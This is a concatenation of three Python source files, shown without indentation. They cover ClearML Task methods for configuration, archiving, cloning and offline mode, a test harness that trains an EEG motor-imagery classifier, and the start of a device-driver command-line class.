self._set_task_property("parent", str(parent) if parent else None)
self._edit(parent=self.data.parent)
def set_comment(self, comment):
# type: (str) -> ()
"""
Set a comment / description for the Task.
:param comment: The comment / description for the Task.
:type comment: str
"""
comment = comment or ''
self._set_task_property("comment", str(comment))
self._edit(comment=str(comment))
def set_task_type(self, task_type):
# type: (Union[str, Task.TaskTypes]) -> ()
"""
Set the task_type for the Task.
:param task_type: The task_type of the Task (see optional values in TaskTypes).
:type task_type: str or TaskTypes
"""
if not isinstance(task_type, self.TaskTypes):
task_type = self.TaskTypes(task_type)
self._set_task_property("task_type", str(task_type))
self._edit(type=task_type)
def set_archived(self, archive):
# type: (bool) -> ()
"""
Archive the Task or remove it from the archived folder.
:param archive: If True archive the Task, If False make sure it is removed from the archived folder
"""
with self._edit_lock:
system_tags = list(set(self.get_system_tags()) | {self.archived_tag}) \
if archive else list(set(self.get_system_tags()) - {self.archived_tag})
self.set_system_tags(system_tags)
def get_archived(self):
# type: () -> bool
"""
Return the Archive state of the Task
:return: If True the Task is archived, otherwise it is not.
"""
return self.archived_tag in self.get_system_tags()
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
For example, to start on iteration 100000, including scalars and plots:
..code-block:: py
task.set_initial_iteration(100000)
Task.set_initial_iteration(100000)
:param int offset: Initial iteration (at starting point)
:return: A newly set initial offset.
"""
if not isinstance(offset, int):
raise ValueError("Initial iteration offset must be an integer")
self._initial_iteration_offset = offset
if self._metrics_manager:
self._metrics_manager.set_iteration_offset(self._initial_iteration_offset)
return self._initial_iteration_offset
def get_initial_iteration(self):
# type: () -> int
"""
Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
:return: The initial iteration offset.
"""
return self._initial_iteration_offset
def get_status(self):
# type: () -> str
"""
Return The task status without refreshing the entire Task object object (only the status property)
TaskStatusEnum: ["created", "in_progress", "stopped", "closed", "failed", "completed",
"queued", "published", "publishing", "unknown"]
:return: str: Task status as string (TaskStatusEnum)
"""
status = self._get_status()[0]
if self._data:
self._data.status = status
return str(status)
def get_output_log_web_page(self):
# type: () -> str
"""
Return the Task results & outputs web page address.
For example: https://demoapp.demo.clear.ml/projects/216431/experiments/60763e04/output/log
:return: http/s URL link.
"""
return '{}/projects/{}/experiments/{}/output/log'.format(
self._get_app_server(),
self.project if self.project is not None else '*',
self.id,
)
def get_reported_scalars(
self,
max_samples=0, # type: int
x_axis='iter' # type: str
):
# type: (...) -> Mapping[str, Mapping[str, Mapping[str, Sequence[float]]]]
"""
Return a nested dictionary for the scalar graphs,
where the first key is the graph title and the second is the series name.
Value is a dict with 'x': values and 'y': values
.. note::
This call is not cached, any call will retrieve all the scalar reports from the back-end.
If the Task has many scalars reported, it might take long for the call to return.
Example:
.. code-block:: py
{'title': {'series': {
'x': [0, 1 ,2],
'y': [10, 11 ,12],
}}}
:param int max_samples: Maximum samples per series to return. Default is 0 returning all scalars.
With sample limit, average scalar values inside sampling window.
:param str x_axis: scalar x_axis, possible values:
'iter': iteration (default), 'timestamp': seconds from start, 'iso_time': absolute time
:return: dict: Nested scalar graphs: dict[title(str), dict[series(str), dict[axis(str), list(float)]]]
"""
if x_axis not in ('iter', 'timestamp', 'iso_time'):
raise ValueError("Scalar x-axis supported values are: 'iter', 'timestamp', 'iso_time'")
# send request
res = self.send(
events.ScalarMetricsIterHistogramRequest(
task=self.id, key=x_axis, samples=max(1, max_samples) if max_samples else None),
raise_on_errors=False,
ignore_errors=True,
)
if not res:
return {}
response = res.wait()
if not response.ok() or not response.response_data:
return {}
return response.response_data
def get_reported_console_output(self, number_of_reports=1):
# type: (int) -> Sequence[str]
"""
Return a list of console outputs reported by the Task. Retrieved outputs are the most updated console outputs.
:param int number_of_reports: The number of reports to return. The default value is ``1``, indicating the
last (most updated) console output
:return: A list of strings, each entry corresponds to one report.
"""
if Session.check_min_api_version('2.9'):
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
navigate_earlier=True,
batch_size=number_of_reports)
else:
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
from_='tail',
batch_size=number_of_reports)
res = self.send(request)
response = res.wait()
if not response.ok() or not response.response_data.get('events'):
return []
lines = [r.get('msg', '') for r in response.response_data['events']]
return lines
def get_configuration_object(self, name):
# type: (str) -> Optional[str]
"""
Get the Task's configuration object section as a blob of text
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:return: The Task's configuration as a text blob (unconstrained text string)
return None if configuration name is not valid
"""
return self._get_configuration_text(name)
def get_configuration_object_as_dict(self, name):
# type: (str) -> Optional[Union[dict, list]]
"""
Get the Task's configuration object section as parsed dictionary
Parsing supports JSON and HOCON, otherwise parse manually with `get_configuration_object()`
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:return: The Task's configuration as a parsed dict.
return None if configuration name is not valid
"""
return self._get_configuration_dict(name)
def get_configuration_objects(self):
# type: () -> Optional[Mapping[str, str]]
"""
Get the Task's configuration object section as a blob of text
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:return: The Task's configurations as a
dict (config name as key) and text blob as value (unconstrained text string)
"""
if not Session.check_min_api_version('2.9'):
raise ValueError(
"Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
configuration = self.data.configuration or {}
return {k: v.value for k, v in configuration.items()}
def set_configuration_object(self, name, config_text=None, description=None, config_type=None, config_dict=None):
# type: (str, Optional[str], Optional[str], Optional[str], Optional[Union[dict, list]]) -> None
"""
Set the Task's configuration object as a blob of text or automatically encoded dictionary/list.
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:param config_text: configuration as a blob of text (unconstrained text string)
usually the content of a configuration file of a sort
:param str description: Configuration section description
:param str config_type: Optional configuration format type
:param dict config_dict: configuration dictionary/list to be encoded using HOCON (json alike) into stored text
Notice you can either pass `config_text` or `config_dict`, not both
"""
return self._set_configuration(
name=name, description=description, config_type=config_type,
config_text=config_text, config_dict=config_dict)
@classmethod
def get_projects(cls):
# type: () -> (List['projects.Project'])
"""
Return a list of projects in the system, sorted by last updated time
:return: A list of all the projects in the system. Each entry is a `services.projects.Project` object.
"""
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update']), raise_on_errors=True)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()) for p in res.response.projects]
return []
@classmethod
def get_project_id(cls, project_name):
# type: (str) -> Optional[str]
"""
Return a project's unique ID (str).
If more than one project matched the project_name, return the last updated project
If no project matched the requested name, returns None
:return: Project unique ID (str), or None if no project was found.
"""
assert project_name
assert isinstance(project_name, str)
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update'], name=exact_match_regex(project_name)),
raise_on_errors=False)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()).id for p in res.response.projects][0]
return None
@staticmethod
def running_locally():
# type: () -> bool
"""
Is the task running locally (i.e., ``clearml-agent`` is not executing it)
:return: True, if the task is running locally. False, if the task is not running locally.
"""
return not running_remotely()
@classmethod
def add_requirements(cls, package_name, package_version=None):
# type: (str, Optional[str]) -> None
"""
Force the adding of a package to the requirements list. If ``package_version`` is None, use the
installed package version, if found.
Example: Task.add_requirements('tensorflow', '2.4.0')
Example: Task.add_requirements('tensorflow', '>=2.4')
Example: Task.add_requirements('tensorflow') -> use the installed tensorflow version
Example: Task.add_requirements('tensorflow', '') -> no version limit
:param str package_name: The package name to add to the "Installed Packages" section of the task.
:param package_version: The package version requirements. If ``None``, then use the installed version.
"""
if not running_remotely() and hasattr(cls, 'current_task') and cls.current_task():
get_logger('task').warning(
'Requirement ignored, Task.add_requirements() must be called before Task.init()')
cls._force_requirements[str(package_name)] = package_version
@classmethod
def ignore_requirements(cls, package_name):
# type: (str) -> None
"""
Ignore a specific package when auto generating the requirements list.
Example: Task.ignore_requirements('pywin32')
:param str package_name: The package name to remove/ignore from the "Installed Packages" section of the task.
"""
if not running_remotely() and hasattr(cls, 'current_task') and cls.current_task():
get_logger('task').warning(
'Requirement ignored, Task.ignore_requirements() must be called before Task.init()')
cls._ignore_requirements.add(str(package_name))
@classmethod
def force_requirements_env_freeze(cls, force=True, requirements_file=None):
# type: (bool, Optional[Union[str, Path]]) -> None
"""
Force using `pip freeze` / `conda list` to store the full requirements of the active environment
(instead of statically analyzing the running code and listing directly imported packages)
Notice: Must be called before `Task.init` !
:param force: Set force using `pip freeze` flag on/off
:param requirements_file: Optional pass requirements.txt file to use
(instead of `pip freeze` or automatic analysis)
"""
cls._force_use_pip_freeze = requirements_file if requirements_file else bool(force)
def _get_default_report_storage_uri(self):
# type: () -> str
if self._offline_mode:
return str(self.get_offline_mode_folder() / 'data')
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
def _get_status(self):
# type: () -> (Optional[str], Optional[str])
if self._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
def _get_last_update(self):
# type: () -> (Optional[datetime])
if self._offline_mode:
return None
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_update']),
).response.tasks
return all_tasks[0].last_update
except Exception:
return None
def _reload_last_iteration(self):
# type: () -> ()
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']),
).response.tasks
self.data.last_iteration = all_tasks[0].last_iteration
except Exception:
return None
def _set_runtime_properties(self, runtime_properties):
# type: (Mapping[str, str]) -> bool
if not Session.check_min_api_version('2.13') or not runtime_properties:
return False
with self._edit_lock:
self.reload()
current_runtime_properties = self.data.runtime or {}
current_runtime_properties.update(runtime_properties)
# noinspection PyProtectedMember
self._edit(runtime=current_runtime_properties)
return True
def _get_runtime_properties(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version('2.13'):
return dict()
return dict(**self.data.runtime) if self.data.runtime else dict()
def _clear_task(self, system_tags=None, comment=None):
# type: (Optional[Sequence[str]], Optional[str]) -> ()
self._data.script = tasks.Script(
binary='', repository='', tag='', branch='', version_num='', entry_point='',
working_dir='', requirements={}, diff='',
)
if Session.check_min_api_version("2.13"):
self._data.models = tasks.TaskModels(input=[], output=[])
self._data.container = dict()
self._data.execution = tasks.Execution(
artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, parameters={}, docker_cmd='')
self._data.comment = str(comment)
self._storage_uri = None
self._data.output.destination = self._storage_uri
self._update_requirements('')
if Session.check_min_api_version('2.13'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='',
hyperparams=dict(), configuration=dict(),
container=self._data.container, models=self._data.models)
elif Session.check_min_api_version('2.9'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='',
hyperparams=dict(), configuration=dict())
elif Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='')
else:
self._set_task_property("tags", system_tags)
self._edit(tags=self._data.tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest=None)
@classmethod
def _get_api_server(cls):
# type: () -> ()
return Session.get_api_server_host()
def _get_app_server(self):
# type: () -> str
if not self._app_server:
self._app_server = Session.get_app_server_host()
return self._app_server
def _is_remote_main_task(self):
# type: () -> bool
"""
:return: return True if running remotely and this Task is the registered main task
"""
return running_remotely() and get_remote_task_id() == self.id
def _edit(self, **kwargs):
# type: (**Any) -> Any
with self._edit_lock:
if self._offline_mode:
for k, v in kwargs.items():
setattr(self.data, k, v)
Path(self.get_offline_mode_folder()).mkdir(parents=True, exist_ok=True)
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'wt') as f:
export_data = self.data.to_dict()
export_data['project_name'] = self.get_project_name()
export_data['offline_folder'] = self.get_offline_mode_folder().as_posix()
json.dump(export_data, f, ensure_ascii=True, sort_keys=True)
return None
# Since we ae using forced update, make sure he task status is valid
status = self._data.status if self._data and self._reload_skip_flag else self.data.status
if status not in (tasks.TaskStatusEnum.created, tasks.TaskStatusEnum.in_progress):
# the exception being name/comment that we can always change.
if kwargs and all(k in ('name', 'comment', 'tags', 'system_tags', 'runtime') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
# type: (Union[dict, str]) -> ()
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# make sure we have str as values:
for key in requirements.keys():
if requirements[key] and not isinstance(requirements[key], str):
requirements[key] = '\n'.join(requirements[key])
# protection, Old API might not support it
# noinspection PyBroadException
try:
with self._edit_lock:
self.reload()
self.data.script.requirements = requirements
if self._offline_mode:
self._edit(script=self.data.script)
else:
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
# type: (dict) -> ()
with self._edit_lock:
self.reload()
self.data.script = script
self._edit(script=script)
def _set_configuration(self, name, description=None, config_type=None, config_text=None, config_dict=None):
# type: (str, Optional[str], Optional[str], Optional[str], Optional[Union[Mapping, list]]) -> None
"""
Set Task configuration text/dict. Multiple configurations are supported.
:param str name: Configuration name.
:param str description: Configuration section description.
:param str config_type: Optional configuration format type (str).
:param config_text: model configuration (unconstrained text string). usually the content
of a configuration file. If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
# make sure we have wither dict or text
mutually_exclusive(config_dict=config_dict, config_text=config_text, _check_none=True)
if not Session.check_min_api_version('2.9'):
raise ValueError("Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
if description:
description = str(description)
# support empty string
a_config = config_dict_to_text(config_dict if config_text is None else config_text)
with self._edit_lock:
self.reload()
configuration = self.data.configuration or {}
configuration[name] = tasks.ConfigurationItem(
name=name, value=a_config, description=description or None, type=config_type or None)
self._edit(configuration=configuration)
def _get_configuration_text(self, name):
# type: (str) -> Optional[str]
"""
Get Task configuration section as text
:param str name: Configuration name.
:return: The Task configuration as text (unconstrained text string).
return None if configuration name is not valid.
"""
if not Session.check_min_api_version('2.9'):
raise ValueError("Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
configuration = self.data.configuration or {}
if not configuration.get(name):
return None
return configuration[name].value
def _get_configuration_dict(self, name):
# type: (str) -> Optional[dict]
"""
Get Task configuration section as dictionary
:param str name: Configuration name.
:return: The Task configuration as dictionary.
return None if configuration name is not valid.
"""
config_text = self._get_configuration_text(name)
if not config_text:
return None
return text_to_config_dict(config_text)
def get_offline_mode_folder(self):
# type: () -> (Optional[Path])
"""
Return the folder where all the task outputs and logs are stored in the offline session.
:return: Path object, local folder, later to be used with `report_offline_session()`
"""
if not self._offline_mode:
return None
return get_offline_dir(task_id=self.task_id)
@classmethod
def _clone_task(
cls,
cloned_task_id, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
execution_overrides=None, # type: Optional[dict]
tags=None, # type: Optional[Sequence[str]]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
log=None, # type: Optional[logging.Logger]
session=None, # type: Optional[Session]
):
# type: (...) -> str
"""
Clone a task
:param str cloned_task_id: Task ID for the task to be cloned
:param str name: New for the new task
:param str comment: Optional comment for the new task
:param dict execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:param list tags: Optional updated model tags
:param str parent: Optional parent Task ID of the new task.
:param str project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:param logging.Logger log: Log object used by the infrastructure.
:param Session session: Session object used for sending requests to the API
:return: The new task's ID.
"""
session = session if session else cls._get_default_session()
use_clone_api = Session.check_min_api_version('2.9')
if use_clone_api:
res = cls._send(
session=session, log=log,
req=tasks.CloneRequest(
task=cloned_task_id,
new_task_name=name,
new_task_tags=tags,
new_task_comment=comment,
new_task_parent=parent,
new_task_project=project,
execution_overrides=execution_overrides,
)
)
cloned_task_id = res.response.id
return cloned_task_id
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
# clear all artifacts
execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input']
if not hasattr(task, 'system_tags') and not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
extra = {}
if hasattr(task, 'hyperparams'):
extra['hyperparams'] = task.hyperparams
if hasattr(task, 'configuration'):
extra['configuration'] = task.configuration
if getattr(task, 'system_tags', None):
extra['system_tags'] = [t for t in task.system_tags if t not in (cls._development_tag, cls.archived_tag)]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment if comment is not None else task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script,
**extra
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
# type: (Optional[Session], Optional[logging.Logger], **Any) -> Any
"""
List all the Tasks based on specific projection.
:param Session session: The session object used for sending requests to the API.
:param logging.Logger log: The Log object.
:param kwargs: Keyword args passed to the GetAllRequest
(see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`)
For example:
.. code-block:: bash
status='completed', 'search_text'='specific_word', 'user'='user_id', 'project'='project_id'
:type kwargs: dict
:return: The API response.
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
@classmethod
def get_by_name(cls, task_name):
# type: (str) -> Task
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
@classmethod
def _get_project_name(cls, project_id):
res = cls._send(cls._get_default_session(), projects.GetByIdRequest(project=project_id), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
return res.response.project.name
def _get_all_events(
self, max_events=100, batch_size=500, order='asc', event_type=None, unique_selector=itemgetter("url")
):
# type: (int, int, str, str, Callable[[dict], Any]) -> Union[List[Any], Set[Any]]
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:param batch_size: The maximum number of events retrieved by each internal call performed by this method.
:param order: Events order (by timestamp) - "asc" for ascending, "desc" for descending.
:param event_type: Event type. Pass None to get all event types.
:param unique_selector: If provided, used to select a value from each event, only a unique set of these
values will be returned by this method.
:return: A list of events from the task. If unique_selector was provided, a set of values selected from events
of the task.
"""
batch_size = max_events or batch_size
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
))
returned_count = log_events.response.returned
total_events = log_events.response.total
scroll = log_events.response.scroll_id
if unique_selector:
events_list = set(map(unique_selector, log_events.response.events))
else:
events_list = log_events.response.events
while returned_count < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
scroll_id=scroll,
))
scroll = log_events.response.scroll_id
returned_count += log_events.response.returned
if unique_selector:
events_list.update(log_events.response.events)
else:
events_list.extend(log_events.response.events)
return events_list
@property
def _edit_lock(self):
# type: () -> ()
# skip the actual lock, this one-time lock will always enter
# only used on shutdown process to avoid deadlocks
if self.__edit_lock is False:
return RLock()
if self.__edit_lock:
return self.__edit_lock
if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2:
self.__edit_lock = RLock()
elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id):
filename = os.path.join(gettempdir(), 'clearml_{}.lock'.format(self.id))
# no need to remove previous file lock if we have a dead process, it will automatically release the lock.
# # noinspection PyBroadException
# try:
# os.unlink(filename)
# except Exception:
# pass
# create a new file based lock
self.__edit_lock = FileRLock(filename=filename)
else:
self.__edit_lock = RLock()
return self.__edit_lock
@_edit_lock.setter
def _edit_lock(self, value):
# type: (RLock) -> ()
self.__edit_lock = value
@classmethod
def __update_master_pid_task(cls, pid=None, task=None):
# type: (Optional[int], Optional[Union[str, Task]]) -> None
pid = pid or os.getpid()
if not task:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':')
elif isinstance(task, str):
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task)
else:
# noinspection PyUnresolvedReferences
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id))
# make sure we refresh the edit lock next time we need it,
task._edit_lock = None
@classmethod
def __get_master_id_task_id(cls):
# type: () -> Optional[str]
master_pid, _, master_task_id = PROC_MASTER_ID_ENV_VAR.get('').partition(':')
# we could not find a task ID, revert to old stub behaviour
if not master_task_id:
return None
return master_task_id
@classmethod
def __get_master_process_id(cls):
# type: () -> Optional[str]
master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':')
# we could not find a task ID, revert to old stub behaviour
if len(master_task_id) < 2 or not master_task_id[1]:
return None
return master_task_id[0]
@classmethod
def __is_subprocess(cls):
# type: () -> bool
# notice this class function is called from Task.ExitHooks, do not rename/move it.
is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \
PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid())
return is_subprocess
@classmethod
def set_offline(cls, offline_mode=False):
# type: (bool) -> None
"""
Set offline mode, where all data and logs are stored into local folder, for later transmission
:param offline_mode: If True, offline-mode is turned on, and no communication to the backend is enabled.
:return:
"""
if not running_remotely():
ENV_OFFLINE_MODE.set(offline_mode)
InterfaceBase._offline_mode = bool(offline_mode)
Session._offline_mode = bool(offline_mode)
@classmethod
def is_offline(cls):
# type: () -> bool
"""
Return offline-mode state, If in offline-mode, no communication to the backend is enabled.
:return: boolean offline-mode state
"""
return cls._offline_mode
@classmethod
def _get_task_status(cls, task_id):
# type: (str) -> (Optional[str], Optional[str])
if cls._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = cls._get_default_session().send(
tasks.GetAllRequest(id=[task_id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
|
_unit_testing.py
|
import os
from threading import Thread
from time import time, sleep
from winsound import Beep
import numpy as np
from rx.operators import take_until_with_time
try:
from neurosky.utils import KeyHandler
from neurosky._connector import Connector
from neurosky._processor import Processor
from neurosky._new_trainer import Trainer
from neurosky._status_manager import StatusManager
except ModuleNotFoundError:
# noinspection PyUnresolvedReferences
from utils import KeyHandler
# noinspection PyUnresolvedReferences
from _connector import Connector
# noinspection PyUnresolvedReferences
from _processor import Processor
# noinspection PyUnresolvedReferences
from _new_trainer import Trainer
# noinspection PyUnresolvedReferences
from _status_manager import StatusManager
def _init_thread(target, args=()):
Thread(target=target, args=args).start()
class _Tester:
def __init__(self):
# initialize
# record
# process with recorded data
# train
self.counter = 0
self.signal_status = 'Poor Signal'
self.is_prediction_mode = False
self.data_to_predict = []
# Initializing
self.status_manager = StatusManager()
self.status_manager.update_status('Initializing...')
# self.connector = Connector(debug=False, verbose=False)
self.processor = Processor(batch_mode=True)
self.trainer = Trainer(classifier_name='MLP') # 'MLP' || 'RandomForest' || 'SVC' || 'KNN' || 'AdaBoost'
# self.connector.poor_signal_level.subscribe(self.check_poor_level)
self.IDENTIFIER_RIGHT_ARM = self.status_manager.add_identifier('right_arm')
self.IDENTIFIER_LEFT_ARM = self.status_manager.add_identifier('left_arm')
self.IDENTIFIER_IDLE = self.status_manager.add_identifier('idle')
# self.key_handler = KeyHandler()
# self.key_handler.add_key_event(key='q', event=self.close_all)
# self.key_handler.add_key_event(key=chr(96), event=self.train, identifier=self.IDENTIFIER_RIGHT_ARM)
# self.key_handler.add_key_event(key=chr(45), event=self.train, identifier=self.IDENTIFIER_LEFT_ARM)
# self.key_handler.add_key_event(key='c', event=self._init_training)
# self.key_handler.add_key_event(key='p', event=self.toggle_prediction)
# self.key_handler.add_key_event(key='3', event=self.train, identifier=self.IDENTIFIER_IDLE)
# self.key_handler.add_key_event(key='p', event=self.trainer.predict)
# self.key_handler.start()
self._init_training()
# self.connector.data.pipe(take_until_with_time(10)).subscribe(
# observer=self.data_to_predict.append,
# on_error=print,
# on_completed=self.recursive_predict
# )
# self.trainer.prediction.subscribe(self.status_manager.predicted_identifier)
def recursive_predict(self):
if self.is_prediction_mode:
self.processor.add_data_batch(self.data_to_predict)
# X = self.processor.pca(self.processor.processed_data.reshape(1, -1))
self.trainer.predict(self.data_to_predict)
self.connector.data.pipe(take_until_with_time(1)).subscribe(
observer=self.loop_data,
on_error=print,
on_completed=self.recursive_predict
)
def loop_data(self, data):
self.data_to_predict.pop(0)
self.data_to_predict.append(data)
def toggle_prediction(self):
self.is_prediction_mode = not self.is_prediction_mode
def _init_training(self):
dir_size = int(len(os.listdir('./motor_imagery_data')) / 2)
split = int(dir_size/3)*2
X = []
y = []
for i in range(split):
right_arm_data = np.load('./motor_imagery_data/right_arm_' + str(i + 1) + '.npy')
self.processor.add_data_batch(right_arm_data)
X.append(self.processor.processed_data)
y.append(self.IDENTIFIER_RIGHT_ARM)
left_arm_data = np.load('./motor_imagery_data/left_arm_' + str(i + 1) + '.npy')
self.processor.add_data_batch(left_arm_data)
X.append(self.processor.processed_data)
y.append(self.IDENTIFIER_LEFT_ARM)
X = self.processor.pca(X)
self.trainer.add_data(X, y)
self.trainer._train()
X_test = []
y_test = []
for i in range(split, dir_size):
right_arm_data = np.load('./motor_imagery_data/right_arm_' + str(i + 1) + '.npy')
self.processor.add_data_batch(right_arm_data)
X_test.append(self.processor.processed_data)
y_test.append(self.IDENTIFIER_RIGHT_ARM)
left_arm_data = np.load('./motor_imagery_data/left_arm_' + str(i + 1) + '.npy')
self.processor.add_data_batch(left_arm_data)
X_test.append(self.processor.processed_data)
y_test.append(self.IDENTIFIER_LEFT_ARM)
X_test = self.processor.pca(X_test)
self.trainer.add_data(X_test, y_test)
print(self.trainer.cls.score(self.trainer.samples, self.trainer.targets))
self.trainer.clear_data()
# self.close_all()
def train(self, identifier):
self.status_manager.update_status('Preparing...')
start_time = time()
while time() - start_time < 3:
pass
Beep(500, 100)
for _ in range(5):
self.status_manager.update_status('Recording...')
self.connector.record('./motor_imagery_data/' + self.status_manager.next_label(identifier))
self.connector.await_recording()
Beep(500, 100)
Beep(500, 100)
# self.status_manager.update_status('Pre-processing...')
# self.processor.add_data_batch(self.connector.recorded_data)
# self.status_manager.update_status('Training...')
# self.trainer.add_data(self.processor.processed_data[0])
# self.trainer.train(identifier)
def check_poor_level(self, level):
if level > 0:
if self.signal_status is not 'Poor Signal...':
print('Poor Signal...')
self.signal_status = 'Poor Signal...'
else:
if self.signal_status is not 'Good Signal':
print('Good Signal')
self.signal_status = 'Good Signal'
def close_all(self):
self.trainer.close()
self.processor.close()
# self.connector.close()
self.status_manager.close()
# self.key_handler.stop()
if __name__ == '__main__':
total_size = 0
for i in range(int(len(os.listdir('./motor_imagery_data')) / 2)):
right_arm_data = np.load('./motor_imagery_data/right_arm_' + str(i + 1) + '.npy')
print(len(right_arm_data))
total_size += len(right_arm_data)
left_arm_data = np.load('./motor_imagery_data/left_arm_' + str(i + 1) + '.npy')
print(len(left_arm_data))
total_size += len(left_arm_data)
print(total_size)
#
# tester = _Tester()
# tester.status_manager.status.subscribe(print)
|
cli.py
|
"""
Command line entry
"""
import os
import sys
import time
import threading
from os import getpid
import psutil
# from .web import Webserver
from ..models import WebserverArgs
from ..core.driver import (Driver, DriverEvents)
from ..core.device_context import DeviceContext
from ..core.tunnel_base import TunnelEvents
from ..framework import AppLogger
from ..framework.utils import resource
from ..framework.constants import APP_TYPE
from ..framework.context import APP_CONTEXT
class CommandLine:
'''Command line entry class
'''
options = None
_tunnel = None
_driver = None
webserver_running = False
supported_commands = []
input_string = None
current_command = None
def __init__(self, **kwargs):
self._build_options(**kwargs)
APP_CONTEXT.mode = APP_TYPE.CLI
# self.communication = 'uart'
# self.device_provider = None
# self.communicator = None
# self.webserver = Webserver(**kwargs)
def listen(self):
'''
Prepare components, initialize the application
'''
# prepare driver
threading.Thread(target=self._prepare_driver).start()
# prepage logger
self._prepare_logger()
def handle_discovered(self, device_provider):
device_context = DeviceContext(device_provider)
APP_CONTEXT.device_context = device_context
if self._tunnel:
self._tunnel.notify('discovered')
def handle_lost(self):
if self._tunnel:
self._tunnel.notify('lost')
def handle_upgrade_finished(self):
if self._tunnel:
self._tunnel.notify(
'continous', 'upgrade_complete', {'success': True})
def handle_upgrade_fail(self, code, message):
if self._tunnel:
self._tunnel.notify('continous', 'upgrade_complete', {
'success': False, 'code': code, 'message': message})
def handle_error(self, error, message):
if self._tunnel:
self._tunnel.notify('lost')
def handle_request(self, method, converted_method, parameters):
result = self._driver.execute(converted_method, parameters)
if self._tunnel:
self._tunnel.notify('invoke', method, result)
